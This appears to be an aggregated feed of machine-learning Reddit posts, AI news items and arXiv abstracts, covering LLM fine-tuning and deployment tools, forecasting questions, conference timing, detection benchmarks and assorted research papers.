    Here's a colab notebook showing a new interface for LLM finetuning that I've been playing around with. Curious if folks here have feedback. Colab: https://colab.research.google.com/drive/1QMeGzR9FnhNJJFmcHtm9RhFP3vrwIkFn Docs: https://www.lamini.ai/blog/free-fast-and-furious-finetuning Github Repo: https://github.com/lamini-ai/lamini LLM fine tuning includes several advanced optimizations: Chinchilla recipe smaller models pretrained on data increases inference speed Instruction fine tuning training on a small high quality set of instructions unlocks the knowledge learned during foundation model training. Latency constrained batching achieves high utilization under load during token generation Containerized SLURM combines fast scheduling of SLURM with LLM containers Mixed precision training uses matrix operations for training There are so many low hanging fruits in LLM tuning, steering, and alignment. We are just getting started on this for enterprise and open source. For this reason I disagree with Sam Altman that the age of bigger models is over. We are still leaving orders of magnitude on the table, e.g. by not including optimizations like sparsity in these models. References for inspiration: [1] - https://arxiv.org/abs/2203.15556 [2] - https://arxiv.org/abs/1910.10683 [3] - https://www.usenix.org/system/files/osdi22-yu.pdf [4] - https://www.schedmd.com/ [5] - https://arxiv.org/abs/1710.03740 submitted by /u/gdiamos [link] [comments]  ( 9 min )
    Wind speed prediction -appreciate opinion [P]
    Thank you for reading this post. As a fancy kitesurfing I’m trying to predict the wind speed +12h. However, so far my succes is limited. How can I improve my prediction? Data So far, I’m using windspeed&direction, temperature and humidity 10 min interval for past 2 year for 6 locations. Features Day of the year and hour of the day. In addition I have aggregated the 10 min data to 1 hour and calculated the mean, min, max and std. All the data then was made into 18 lags. Models Linear regression, kneigbor an random Forrest. However, only random forest was slightly better then the liniear regression. What type of features and models would you recommend? Cheers submitted by /u/Any-Description3824 [link] [comments]  ( 8 min )
    [D] NeurIPS 2023 reviews release time?
    Hey guys, I was wondering if y’all know when NeurIPS reviews for this year would be released? I know the response period starts on August 4, but do we get to see reviews before? Are they all released at once, or gradually as reviewers finish them? Thanks! submitted by /u/Icy_Background_4524 [link] [comments]  ( 8 min )
    [R] detrex: A Strong Benchmark for Detection Transformers
    In October of last year, we open-sourced detrex as the first unified research platform focusing on the DETR-based algorithms. After several version updates and a significant number of experiments, we conducted a detailed benchmarking of the DETR-based models supported by detrex. Our paper has already been preprinted on ArXiv: https://arxiv.org/abs/2306.07265 And our project repo is here: https://github.com/IDEA-Research/detrex The main characteristics of detrex can be summarized as follows: Fully utilizing LazyConfig as the configuration system, which is highly flexible, convenient, and easily modifiable. Reproducing results on mainstream algorithms surpassing the original implementations by more than 0.2AP - 1.1AP. Supports lots of SoTA backbone including EVA, InternImage, FocalNet, Swin-T, etc. Each algorithm is implemented as an independent project, ensuring no mutual interference between algorithms. Users can confidently implement their own ideas based on detrex. The training code is simple, consisting of approximately 200 lines, and highly customizable, allowing for easy modifications and hacks. Abundant documentation and tutorials are provided. Active response to issues and timely repository updates. ​ Here's some results in our paper, more details can be found in paper: ​ https://preview.redd.it/mdxs4xydblbb1.png?width=1007&format=png&auto=webp&s=a92acc36663365c84be8f86e74c521157fa26202 https://preview.redd.it/f4c3zkvfblbb1.png?width=726&format=png&auto=webp&s=d684591dbd9e16610f3b9b483db1190fe87c7589 https://preview.redd.it/zvcy3tajblbb1.png?width=878&format=png&auto=webp&s=03ce7eb07dbc249a03f8536ce9fad66dbd43841a ​ submitted by /u/Technical-Vast1314 [link] [comments]  ( 9 min )
    [D] Wondering if anyone does HPC or machine learning in Windows?
    With the increased productivity of vscode, does anyone do their dev work for machine learning on a windows server? I have also been getting problems running a jupyter server on ubuntu accessing my gpus. I believe it is easier on a windows server? submitted by /u/Studyr3ddit [link] [comments]  ( 8 min )
    [D] How vital is it to physically attend SIGGRAPH for my early career? Is it worth missing out on hiking the Pyrenees with my girlfriend?
    Bluntly: Is the added benefit of attending SIGGRAPH(instead of merely indulging in the Virtual Access stuff) worth not hiking the Pyrenees with my girlfriend? I am a graduate student specializing in computer graphics and AI stuff. I'm very intent on finding some cool career at the intersection of technology and art so I signed up for SIGGRAPH back in April. I've been scouring information on generative art, NeRFs, and anything on the cutting edge of graphics for a while now so this is obviously the right place. I'd be happy enough indulging in all the talks and demos, but I'm especially interested in the networking aspect and finding a way to give myself a leg up on discovering a promising career. I have been feverishly working to develop my career since I've gotten to grad school, so this…  ( 10 min )
    [D] What is the most efficient version of OpenAI Whisper?
    Hi everyone, I know that there are some different versions of Whisper available in the open-source community (Whisper X, Whisper JAX, etc.), but I'm keeping updated with the best version of the model. Specifically, I'm trying to understand the best Whisper implementation for a task to transcribe a big batch of videos (~10k videos, ~30min long). I'd like to know your thoughts on this. submitted by /u/paulo_zip [link] [comments]  ( 8 min )
    [R]If you have used Lime with bert ....help me out please
    if anyone has succesfully implemented a lime text explaintion with bert model please do share your code with me, i am trying to get lime to work for layout ML, bert and layoutML have similar architecture so i can find something new from your code to apply to mine submitted by /u/Affectionate_Win2460 [link] [comments]  ( 8 min )
    [D] 📚 The Learning Corner (Andrew NG Free Ai Courses Pt. 1)
    📚 The Learning Corner (Andrew NG Free Ai Courses Pt. 1) This is a list of some of the best Ai Free courses by Andrew NG, we will release the second part of the list on our next newsletter installment (link) Generative AI with Large Language Models LangChain: Chat With Your Data LangChain for LLM Application Development How Diffusion Models Work submitted by /u/Yavero [link] [comments]  ( 8 min )
    [D] What's the status of chart-to-text
    I've been looking into solutions to transform charts into descriptions. There were great datasets introduced last year by this paper: https://arxiv.org/pdf/2203.06486.pdf But I haven't found many updates since, especially nothing super convincing. Do any of you know more? submitted by /u/Trick_Brain [link] [comments]  ( 8 min )
    [D] What are some interesting research that combine AI with the physical world
    Most of the talk these days is about LLMs. I am curious about some daring AI projects that try to solve problems from the physical realm that humans won't be able to handle. I am talking about things beyond the human intelligence. For instance, trying to extract formulas for some physical actions, whose analytical formulas would be hard for humans to formulate but machine learning systems can better approximate. I don't know, maybe teaching small machines to fly with very few components, no hardcoded formulas and a ML system that continuously learns from trial and error. Sorry if this sounds dumb. I am just a software engineer with some interest in AI. submitted by /u/besabestin [link] [comments]  ( 8 min )
    [D] LSTM multivariate forecasting
    Hi, I'm currently working on timeseries forecasting in pairs where one timeseries is suspected to cause the other timeseries. I also have the forecast of the causing timeseries and I use them to predict the other timeseries. Note that extrapolation capabilities are required since the forecasts of the first timeseries are not always in the range of the training data. I'm trying to use a simple LSTM model for that task and I tried two ways: training a model using past values of both timeseries and the current value of the first timeseries, and training using only the past and current values of the other timeseries. To my surprise, the forecasts using only the first timeseries values without the values of the timeseries we forecast are better. Does this make sense or am I doing 100% something wrong? When scaling the data do I need to scale values of each timeseries separately or scale them together? Also, what other ways you suggest for forecasting using another timeseries data and existing forecast? submitted by /u/soundgardener666 [link] [comments]  ( 9 min )
    MongoDB for Semantic Search [D]
    I'm quite new to semantic search and looking for an easy-to-use database tool; been looking into MongoDB's semantic search capabilities and following this tutorial. Is anyone using MongoDB for semantic search? If so, what did you think? If not, was there a reason why? Do you have any recommendations that might help me pick the right tool to get started with vector/semantic search? submitted by /u/Important-Sun-3562 [link] [comments]  ( 8 min )
    [R] CorrFL: Correlation-Based Neural Network Architecture for Unavailability Concerns in a Heterogeneous IoT Environment
    An interesting article that tackles a new dimension in Federated Learning (FL) termed oblique federated learning. Link: https://ieeexplore.ieee.org/abstract/document/10132049 submitted by /u/ias18 [link] [comments]  ( 8 min )
    [Discussion] Video Translation Task
    I am working on a project related to Deep Learning translations. We have YouTube videos that we are looking to translate from English to Hindi. But we want the translated audio to sync with the mouth movements of the speaker. How to go about this task? submitted by /u/arhamm40182 [link] [comments]  ( 8 min )
    [D] What do you do with imbalanced target data in a non-binary RF classification problem?
    Hey all, I’m a relatively new data scientist working on my first serious classification project. We’re predicting our target, which is made up of four categories, using the random forest classifier from sklearn. For the target, three categories have about 250 samples and the fourth has about 1200 samples. So far, I’ve just done a stratified shuffle split around the target. Is there anything else that I should make sure to do here to account for the imbalance? Currently, my model just predicts the most common category for almost all of the predictions, which gives it a decent score but makes me feel like this isn’t a useful model. Would appreciate any advice. Thanks! submitted by /u/NDVGuy [link] [comments]  ( 8 min )
    [P] Weights and biases approach -1 or 1
    Hi, ive been desinging my own C code to make neural networks. Mainly for a project and to mess around. It works pretty well but i find that the weights and biases of the finished network are practically all 1, -1 or thereabouts. Is this normal? Again, the network works pretty well, it just seems a bit weird to me. Im using it to predict hand-written characters. Im using sigmoid as my activation function (tried RELU but didnt predict too well, maybe its because I train with a pretty small sample pool?). Weights and biases are randomly initialized with values between -1 and 1 and are capped during training so that they dont exceed -1 or 1. Im thinking this might be the issue. Problem is that if i dont cap them like this, they start to grow and grow the closer you are to the first hidden layer. The last hidden layer would have weights and biases between -1 and 1, but the others started to get bigger and bigger, so i ended up capping it like that to solve it. I believe this is common practice, but maybe the way im capping them is the problem (essentially if a weight or bias exceeds -1 or 1 after having been corrected, i equal it to -1 or 1 respectively).Im not sure what other info i should be providing, as far as i know its a pretty basic neural network, not doing anything too fancy. Thanks in advance. submitted by /u/Automatic-Syrup8490 [link] [comments]  ( 9 min )
    [R] Cross-Entropy is All You Need… Or is It?
    Hey r/machinelearning! I recently wrote an article titled "Cross-Entropy is All You Need… Or is It?" where I discuss extensions to the Cross-Entropy loss to make it better when used in noisy production datasets. I've had great results on my end using this loss, so I wanted to share it with you all and get your opinions and insights! ➡️ Article link ➡️ Code & Colab link Summary: This article introduces the Smooth Generalized Cross-Entropy (SGCE) loss function, a way to address training classification models with noisy labels while still calibrating your model's confidence scores. The article demonstrates the application of SGCE on the task of Named Entity Recognition (NER), but it is applicable to many other tasks. The loss function combines the Cross-Entropy (CE) and Mean Absolute Error…  ( 9 min )
    [D] Are NLP jobs tied to one's own native language?
    I'm considering doing a master's in NLP but concerned if NLP jobs are tied to one's own native language- for example if I'm german native I only get NLP jobs dealing with german language etc. Is this the case or can it be broader? And is it still a wise choice to get a master's in this field? submitted by /u/dauntbooksandyou [link] [comments]  ( 8 min )
    [R] Enhancing Continuous Time Series Modelling with a Latent ODE-LSTM Approach
    https://arxiv.org/abs/2307.05126 submitted by /u/cici118 [link] [comments]  ( 8 min )
    [P] langchain-lite alternative
    Although langchain is an impressive library, I tend to find it is… a little unintuitive, at least for non-trivial examples or examples that don’t have a predefined chains/templates related, it's overly prescriptive; and the various levels of abstraction don't resonate with me related, can be difficult to debug or understand what’s happening in intermediate steps of the chain or what’s it’s actually sending OpenAI So, I built a “langchain-lite” package called llm-workflow https://github.com/shane-kercheval/llm-workflow The value proposition is basically: easily build up a sequence of tasks (e.g. prompt-template -> chat) called a workflow, where the output of one task serves as the input to the next task in the workflow track history; understand what's happening in each of the …  ( 10 min )
    [P] Haven: Deploy Open Source LLMs on Your Own Cloud
    Open source LLMs are a great privacy-preserving alternative to using the ChatGPT API, but deploying them in production is still really hard - especially for people without ML experience and knowledge about ML infrastructure. With Haven, we make it possible to deploy LLMs with just a few lines of code! GitHub: https://github.com/havenhq/haven Website: https://haven.run/ Colab Demo: https://colab.research.google.com/drive/1eGGSisS9Du5-_KcaejY5y9vk9v7EIfba?authuser=2#scrollTo=YYECIKqAGId8 ​ Haven’s main component is the manager, which comes as a container image that can be deployed in your GCP environment. The manager is your central entrypoint and can be used to spin up LLMs on GPUs with just one line of code: from havenpy import Haven client = Haven(":50051", "") worker_id = client.create_inference_worker( model_name="@huggingface/mosaicml/mpt-7b-chat", quantization="float16", gpu_type="T4", gpu_count=2) ​ After spinning up inference workers, you can query them with both a chat completion and a normal completion endpoint, similar to the OpenAI API. res = client.chat_completion(worker_id, messages=[{ "content": "Who would win in a cagefight: Mark Zuckerberg or Elon Musk?", "role": "USER" }], stream=True, temperature=0.8) for r in res: print(r.text, flush=True, end="") ​ Our inference server is powered by vllm to provide the fastest inference possible. In the next weeks, we plan to add support for more cloud providers as well as fine-tuning with a single line of code. We'd love to hear your feedback! submitted by /u/jger227 [link] [comments]  ( 9 min )
  • Open

    A new AI Prompt Wars game was released
    Pretty fun actually. According to the FAQs it uses Stable Diffusion to generate images from participants' prompts and then compares them to determine a winner. submitted by /u/superander [link] [comments]  ( 8 min )
    Survey for generative AI photos and how this will affect Shutterstock and Getty
    I am trying to figure out how people have been reacting to recent changes in generative AI technology and how it will affect the artistic community. It would be greatly appreciated if as many poeple could fill out this survey attached. If you are a photographer or someone who purchases stock photos or likes to make AI images this pertains to you. Will take one minute. Thanks. https://forms.gle/NZJaEVZBfQb1uiaM9 submitted by /u/mattyb24643 [link] [comments]  ( 8 min )
    Are there any free tools that can summarize very long video transcripts?
    All the tools I’ve seen for this can only summarize up to 10ish minutes of dialog in a free version. Looking for an hour plus. I don’t mind if the writing is worse than GPT4 or whatever, would be better than nothing submitted by /u/IndependentFormal8 [link] [comments]  ( 8 min )
    Is there an AI to generate images of ideas of websites?
    I want an AI that can generate images of websites so I can develop then for personal use, is there a tool that can make that? I tried Blue Willow, Dall-e and Canva AI, none of then could generate it. submitted by /u/Luxy_Lockes [link] [comments]  ( 8 min )
    Holy Fuck...This is absolutely incredible. Achieving a better, more flexible result with 19 neurons instead of 100,000 neurons?!?
    submitted by /u/JakeYashen [link] [comments]  ( 8 min )
    ChatGPT Is Losing Users. Is The Artificial Intelligence Craze Over?
    submitted by /u/byteaw [link] [comments]  ( 8 min )
    Can you simulate ambience of a specific soundscape and its surroundings using AI?
    Hello guys, I am working on a song project for which I wanted to make an intro which resembles a port / harbor back in the 16th / 17th / 18th century. Stuff like sound of waves, harbor bells, people working and talking, carrying cargo constantly on ships. And then ultimately the sounds of a ship setting sail and leaving the harbor. ​ At first I thought I'd have to put many different royalty free sounds together to simulate this ambience but I remembered that AI is growing fast and already creating music. And that's where I wanted to ask you guys if you know if it's already possible to simulate a place using an AI and if yes, how? ​ This would really help me out. If you know other subreddits where I could ask, please feel free to suggest them. Thanks and have a good day! submitted by /u/space_dust0 [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/11/2023
    KPMG plans to spend $2 billion on AI and cloud services through an expanded partnership with Microsoft, aiming to incorporate AI into its core services. This move is in response to a slowdown in advisory deals and a challenging economic environment.[1] Elon Musk will host a conversation about AI with Rep. Ro Khanna (D-Calif.) and Rep. Mike Gallagher (R-Wis.) on Twitter Spaces Wednesday evening, a congressional aide confirmed to The Hill. Gallagher and Khanna have in the past stressed the need for balance in the technology, both expressing optimism about potential benefits while also sharing concerns about the potential dangers it can pose.[2] IT major Wipro announced the launch of the ai360 service and plans to invest $1 billion in AI over the next three years. The move follows Tata Consultancy Services’ announcement to train 25,000 engineers on generative AI tools.[3] IBM is considering the use of artificial intelligence chips that it designed in-house to lower the costs of operating a cloud computing service it made widely available this week, an executive said Tuesday.[4] Sources: [1] https://www.livemint.com/companies/news/kpmg-to-enter-into-a-deal-with-microsoft-spend-2-billion-in-ai-and-cloud-services-11689122323635.html [2] https://thehill.com/homenews/4092145-elon-musk-to-talk-ai-with-bipartisan-pair-of-lawmakers/ [3] https://www.livemint.com/companies/news/wipro-launches-ai360-will-invest-1-billion-into-ai-the-next-three-years-11689132228044.html [4] https://www.reuters.com/technology/ibm-mulls-using-its-own-ai-chip-new-cloud-service-lower-costs-2023-07-11/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
  • Open

    Faster training of Dueling DQN
    Hi everyone, Has anyone worked with training dueling DQN faster or sample efficient? I found papers: Fast RL with slow updates: https://github.com/amazon-science/fast-rl-with-slow-updates Sample efficient deep reinforcement learning via uncertainty estimation: https://openreview.net/forum?id=vrW3tvDfOJQ Sample efficient deep reinforcement learning via episodic backward update: https://arxiv.org/abs/1805.12375 Has anyone worked with any of these? Or do you know any other strategies that have been used to make Dueling DQN learn faster? (I have already experimented with RAINBOW, so wanted to try something on top of it) submitted by /u/mr_formaldehyde [link] [comments]  ( 8 min )
    The inverse reward of the same MDP gives a different result when using value iteration
    Hello, I have an MDP which exists of 2 machine and I need to make decisions on when to do maintenance on the machine depending on the quality of the production. In one situation I created a reward structure based on the production loss of the system. and in the other situation I created a reward structure based on the throughput of the system which is exactly the inverse of the production loss, as you can see in the figure below. So I should suppose that the result of the value iteration algorithm should be exactly the same but it is not. Does anyone know what the reason for that could be or what I can try to do to find out why this happens? Because in value iteration the solution should be optimal, so 2 optimal solutions are not possible. It would be really helpful if someone has an idea about this. ​ https://preview.redd.it/ni23yr5pfjbb1.png?width=1590&format=png&auto=webp&s=5550afef24552b5f516c15aacfc6f0d37af6fdd7 ​ https://preview.redd.it/dundnsrsfjbb1.png?width=453&format=png&auto=webp&s=20d300946254f1d08f3404100a565db27cb5658f submitted by /u/IcyWatch9445 [link] [comments]  ( 9 min )
  • Open

    Generative AI imagines new protein structures
    MIT researchers develop "FrameDiff," a computational tool that uses generative AI to craft new protein structures, with the aim of accelerating drug development and improving gene therapy.  ( 9 min )
  • Open

    Need help for an exam preparation task
    This is the given task. I have never seen a neural network displayed like this. What do the Upwards Arrows in the X1 input Neuron and the upper Neuron in the hidden layer mean? What are the values at the hidden layer (e.g "3.456"), is this the threshold? If yes would I then continue with 1 and multiply 1 with the next weight (8.805 in that case) ? Problem is all my friends don't know it as well and we do not know who else to ask, so we ask reddit.. https://preview.redd.it/xgq4luwnakbb1.png?width=882&format=png&auto=webp&s=d032255a5296a5451eaa7c6e5821dd2981390086 submitted by /u/SoSickBR [link] [comments]  ( 8 min )
    Weights and biases approach -1 or 1
    Hi, ive been desinging my own C code to make neural networks. Mainly for a project and to mess around. It works pretty well but i find that the weights and biases of the finished network are practically all 1, -1 or thereabouts. Is this normal? Again, the network works pretty well, it just seems a bit weird to me. Im using it to predict hand-written characters. Im using sigmoid as my activation function (tried RELU but didnt predict too well, maybe its because I trian with a pretty small sample pool?). Weights and biases are randomly initialized with values between -1 and 1 and are capped during training so that they dont exceed -1 or 1. Im thinking this might be the issue. Problem is that if i dont cap them like this, they start to grow and grow the closer you are to the first hidden layer. The last hidden layer would have weights and biases between -1 and 1, but the others started to get bigger and bigger, so i ended up capping it like that to solve it. I believe this is common practice, but maybe the way im capping them is the problem (essentially if a weight or bias exceeds -1 or 1 after having been corrected, i equal it to -1 or 1 respectively).Im not sure what other info i should be providing, as far as i know its a pretty basic neural network, not doing anything too fancy. Thanks in advance. submitted by /u/Automatic-Syrup8490 [link] [comments]  ( 9 min )
  • Open

    How to mark a language in HTML
    In HTML you can mark the language of a piece of text by putting it inside span tags and setting the lang attribute to a two-letter abbreviation. For example, Allons enfants de la Patrie, Le jour de gloire est arrivé ! indicates that the first two lines of the French national anthem are in […] How to mark a language in HTML first appeared on John D. Cook.  ( 5 min )
  • Open

    Thinking beyond audio: Augmenting headphones for everyday digital interactions
    Because headphones rank among the most popular wearables in the market, we have an exciting opportunity to expand their capabilities through integrating existing sensors with supplementary ones to enable a wide variety of experiences that go beyond traditional audio control. The post Thinking beyond audio: Augmenting headphones for everyday digital interactions appeared first on Microsoft Research.  ( 12 min )
  • Open

    Score! Team NVIDIA Takes Trophy in Recommendation Systems
    A crack NVIDIA team of five machine learning experts spread across four continents won all three tasks in a hotly contested, prestigious competition to build state-of-the-art recommendation systems. The results reflect the group’s savvy applying the NVIDIA AI platform to real-world challenges for these engines of the digital economy. Recommenders serve up trillions of search Read article >  ( 6 min )
    MosaicML Helps AI Users Boost Accuracy, Cut Costs and Save Time
    Startup MosaicML is on a mission to help the AI community improve prediction accuracy, decrease costs and save time by providing tools for easy training and deployment of large AI models. In this episode of NVIDIA’s AI Podcast, host Noah Kravitz speaks with MosaicML CEO and co-founder Naveen Rao about how the company aims to Read article >  ( 5 min )
  • Open

    Isotuning With Applications To Scale-Free Online Learning. (arXiv:2112.14586v2 [cs.LG] UPDATED)
    We extend and combine several tools of the literature to design fast, adaptive, anytime and scale-free online learning algorithms. Scale-free regret bounds must scale linearly with the maximum loss, both toward large losses and toward very small losses. Adaptive regret bounds demonstrate that an algorithm can take advantage of easy data and potentially have constant regret. We seek to develop fast algorithms that depend on as few parameters as possible, in particular they should be anytime and thus not depend on the time horizon. Our first and main tool, isotuning, is a generalization of the idea of balancing the trade-off of the regret. We develop a set of tools to design and analyze such learning rates easily and show that they adapts automatically to the rate of the regret (whether constant, $O(\log T)$, $O(\sqrt{T})$, etc.) within a factor 2 of the optimal learning rate in hindsight for the same observed quantities. The second tool is an online correction, which allows us to obtain centered bounds for many algorithms, to prevent the regret bounds from being vacuous when the domain is overly large or only partially constrained. The last tool, null updates, prevents the algorithm from performing overly large updates, which could result in unbounded regret, or even invalid updates. We develop a general theory using these tools and apply it to several standard algorithms. In particular, we (almost entirely) restore the adaptivity to small losses of FTRL for unbounded domains, design and prove scale-free adaptive guarantees for a variant of Mirror Descent (at least when the Bregman divergence is convex in its second argument), extend Adapt-ML-Prod to scale-free guarantees, and provide several other minor contributions about Prod, AdaHedge, BOA and Soft-Bayes.  ( 3 min )
    RELDEC: Reinforcement Learning-Based Decoding of Moderate Length LDPC Codes. (arXiv:2112.13934v2 [cs.IT] UPDATED)
    In this work we propose RELDEC, a novel approach for sequential decoding of moderate length low-density parity-check (LDPC) codes. The main idea behind RELDEC is that an optimized decoding policy is subsequently obtained via reinforcement learning based on a Markov decision process (MDP). In contrast to our previous work, where an agent learns to schedule only a single check node (CN) within a group (cluster) of CNs per iteration, in this work we train the agent to schedule all CNs in a cluster, and all clusters in every iteration. That is, in each learning step of RELDEC an agent learns to schedule CN clusters sequentially depending on a reward associated with the outcome of scheduling a particular cluster. We also modify the state space representation of the MDP, enabling RELDEC to be suitable for larger block length LDPC codes than those studied in our previous work. Furthermore, to address decoding under varying channel conditions, we propose agile meta-RELDEC (AM-RELDEC) that employs meta-reinforcement learning. The proposed RELDEC scheme significantly outperforms standard flooding and random sequential decoding for a variety of LDPC codes, including codes designed for 5G new radio.  ( 2 min )
    CT-based Subchondral Bone Microstructural Analysis in Knee Osteoarthritis via MR-Guided Distillation Learning. (arXiv:2307.04390v2 [eess.IV] UPDATED)
    Background: MR-based subchondral bone effectively predicts knee osteoarthritis. However, its clinical application is limited by the cost and time of MR. Purpose: We aim to develop a novel distillation-learning-based method named SRRD for subchondral bone microstructural analysis using easily-acquired CT images, which leverages paired MR images to enhance the CT-based analysis model during training. Materials and Methods: Knee joint images of both CT and MR modalities were collected from October 2020 to May 2021. Firstly, we developed a GAN-based generative model to transform MR images into CT images, which was used to establish the anatomical correspondence between the two modalities. Next, we obtained numerous patches of subchondral bone regions of MR images, together with their trabecular parameters (BV / TV, Tb. Th, Tb. Sp, Tb. N) from the corresponding CT image patches via regression. The distillation-learning technique was used to train the regression model and transfer MR structural information to the CT-based model. The regressed trabecular parameters were further used for knee osteoarthritis classification. Results: A total of 80 participants were evaluated. CT-based regression results of trabecular parameters achieved intra-class correlation coefficients (ICCs) of 0.804, 0.773, 0.711, and 0.622 for BV / TV, Tb. Th, Tb. Sp, and Tb. N, respectively. The use of distillation learning significantly improved the performance of the CT-based knee osteoarthritis classification method using the CNN approach, yielding an AUC score of 0.767 (95% CI, 0.681-0.853) instead of 0.658 (95% CI, 0.574-0.742) (p<.001). Conclusions: The proposed SRRD method showed high reliability and validity in MR-CT registration, regression, and knee osteoarthritis classification, indicating the feasibility of subchondral bone microstructural analysis based on CT images.  ( 3 min )
    Hyper-parameter Tuning for Adversarially Robust Models. (arXiv:2304.02497v2 [cs.LG] UPDATED)
    This work focuses on the problem of hyper-parameter tuning (HPT) for robust (i.e., adversarially trained) models, shedding light on the new challenges and opportunities arising during the HPT process for robust models. To this end, we conduct an extensive experimental study based on 3 popular deep models, in which we explore exhaustively 9 (discretized) HPs, 2 fidelity dimensions, and 2 attack bounds, for a total of 19208 configurations (corresponding to 50 thousand GPU hours). Through this study, we show that the complexity of the HPT problem is further exacerbated in adversarial settings due to the need to independently tune the HPs used during standard and adversarial training: succeeding in doing so (i.e., adopting different HP settings in both phases) can lead to a reduction of up to 80% and 43% of the error for clean and adversarial inputs, respectively. On the other hand, we also identify new opportunities to reduce the cost of HPT for robust models. Specifically, we propose to leverage cheap adversarial training methods to obtain inexpensive, yet highly correlated, estimations of the quality achievable using state-of-the-art methods. We show that, by exploiting this novel idea in conjunction with a recent multi-fidelity optimizer (taKG), the efficiency of the HPT process can be enhanced by up to 2.1x.  ( 2 min )
    Gait Characterization in Duchenne Muscular Dystrophy (DMD) Using a Single-Sensor Accelerometer: Classical Machine Learning and Deep Learning Approaches. (arXiv:2105.06295v3 [eess.SP] UPDATED)
    Differences in gait patterns of children with Duchenne muscular dystrophy (DMD) and typically-developing (TD) peers are visible to the eye, but quantifications of those differences outside of the gait laboratory have been elusive. In this work, we measured vertical, mediolateral, and anteroposterior acceleration using a waist-worn iPhone accelerometer during ambulation across a typical range of velocities. Fifteen TD and fifteen DMD children from 3-16 years of age underwent eight walking/running activities, including five 25 meters walk/run speed-calibration tests at a slow walk to running speeds (SC-L1 to SC-L5), a 6-minute walk test (6MWT), a 100 meters fast-walk/jog/run (100MRW), and a free walk (FW). For clinical anchoring purposes, participants completed a Northstar Ambulatory Assessment (NSAA). We extracted temporospatial gait clinical features (CFs) and applied multiple machine learning (ML) approaches to differentiate between DMD and TD children using extracted temporospatial gait CFs and raw data. Extracted temporospatial gait CFs showed reduced step length and a greater mediolateral component of total power (TP) consistent with shorter strides and Trendelenberg-like gait commonly observed in DMD. ML approaches using temporospatial gait CFs and raw data varied in effectiveness at differentiating between DMD and TD controls at different speeds, with an accuracy of up to 100%. We demonstrate that by using ML with accelerometer data from a consumer-grade smartphone, we can capture DMD-associated gait characteristics in toddlers to teens.  ( 3 min )
    Directed Diffusion: Direct Control of Object Placement through Attention Guidance. (arXiv:2302.13153v2 [cs.CV] UPDATED)
    Text-guided diffusion models such as DALLE-2, Imagen, and Stable Diffusion are able to generate an effectively endless variety of images given only a short text prompt describing the desired image content. In many cases the images are of very high quality. However, these models often struggle to compose scenes containing several key objects such as characters in specified positional relationships. The missing capability to "direct" the placement of characters and objects both within and across images is crucial in storytelling, as recognized in the literature on film and animation theory. In this work, we take a particularly straightforward approach to providing the needed direction. Drawing on the observation that the cross-attention maps for prompt words reflect the spatial layout of objects denoted by those words, we introduce an optimization objective that produces ``activation'' at desired positions in these cross-attention maps. The resulting approach is a step toward generalizing the applicability of text-guided diffusion models beyond single images to collections of related images, as in storybooks. To the best of our knowledge, our Directed Diffusion method is the first diffusion technique that provides positional control over multiple objects, while making use of an existing pre-trained model and maintaining a coherent blend between the positioned objects and the background. Moreover, it requires only a few lines to implement.  ( 3 min )
    Single-Model Attribution of Generative Models Through Final-Layer Inversion. (arXiv:2306.06210v2 [cs.CV] UPDATED)
    Recent groundbreaking developments on generative modeling have sparked interest in practical single-model attribution. Such methods predict whether a sample was generated by a specific generator or not, for instance, to prove intellectual property theft. However, previous works are either limited to the closed-world setting or require undesirable changes of the generative model. We address these shortcomings by proposing FLIPAD, a new approach for single-model attribution in the open-world setting based on final-layer inversion and anomaly detection. We show that the utilized final-layer inversion can be reduced to a convex lasso optimization problem, making our approach theoretically sound and computationally efficient. The theoretical findings are accompanied by an experimental study demonstrating the effectiveness of our approach, outperforming the existing methods.  ( 2 min )
    Distilling BlackBox to Interpretable models for Efficient Transfer Learning. (arXiv:2305.17303v7 [cs.CV] UPDATED)
    Building generalizable AI models is one of the primary challenges in the healthcare domain. While radiologists rely on generalizable descriptive rules of abnormality, Neural Network (NN) models suffer even with a slight shift in input distribution (e.g., scanner type). Fine-tuning a model to transfer knowledge from one domain to another requires a significant amount of labeled data in the target domain. In this paper, we develop an interpretable model that can be efficiently fine-tuned to an unseen target domain with minimal computational cost. We assume the interpretable component of NN to be approximately domain-invariant. However, interpretable models typically underperform compared to their Blackbox (BB) variants. We start with a BB in the source domain and distill it into a \emph{mixture} of shallow interpretable models using human-understandable concepts. As each interpretable model covers a subset of data, a mixture of interpretable models achieves comparable performance as BB. Further, we use the pseudo-labeling technique from semi-supervised learning (SSL) to learn the concept classifier in the target domain, followed by fine-tuning the interpretable models in the target domain. We evaluate our model using a real-life large-scale chest-X-ray (CXR) classification dataset. The code is available at: \url{https://github.com/batmanlab/MICCAI-2023-Route-interpret-repeat-CXRs}.  ( 3 min )
    Improving Code Example Recommendations on Informal Documentation Using BERT and Query-Aware LSH: A Comparative Study. (arXiv:2305.03017v2 [cs.SE] UPDATED)
    Our research investigates the recommendation of code examples to aid software developers, a practice that saves developers significant time by providing ready-to-use code snippets. The focus of our study is Stack Overflow, a commonly used resource for coding discussions and solutions, particularly in the context of the Java programming language. We applied BERT, a powerful Large Language Model (LLM) that enables us to transform code examples into numerical vectors by extracting their semantic information. Once these numerical representations are prepared, we identify Approximate Nearest Neighbors (ANN) using Locality-Sensitive Hashing (LSH). Our research employed two variants of LSH: Random Hyperplane-based LSH and Query-Aware LSH. We rigorously compared these two approaches across four parameters: HitRate, Mean Reciprocal Rank (MRR), Average Execution Time, and Relevance. Our study revealed that the Query-Aware (QA) approach showed superior performance over the Random Hyperplane-based (RH) method. Specifically, it exhibited a notable improvement of 20% to 35% in HitRate for query pairs compared to the RH approach. Furthermore, the QA approach proved significantly more time-efficient, with its speed in creating hashing tables and assigning data samples to buckets being at least four times faster. It can return code examples within milliseconds, whereas the RH approach typically requires several seconds to recommend code examples. Due to the superior performance of the QA approach, we tested it against PostFinder and FaCoY, the state-of-the-art baselines. Our QA method showed comparable efficiency proving its potential for effective code recommendation.  ( 3 min )
    A Survey on Explainable Anomaly Detection. (arXiv:2210.06959v2 [cs.LG] UPDATED)
    In the past two decades, most research on anomaly detection has focused on improving the accuracy of the detection, while largely ignoring the explainability of the corresponding methods and thus leaving the explanation of outcomes to practitioners. As anomaly detection algorithms are increasingly used in safety-critical domains, providing explanations for the high-stakes decisions made in those domains has become an ethical and regulatory requirement. Therefore, this work provides a comprehensive and structured survey on state-of-the-art explainable anomaly detection techniques. We propose a taxonomy based on the main aspects that characterize each explainable anomaly detection technique, aiming to help practitioners and researchers find the explainable anomaly detection method that best suits their needs.  ( 2 min )
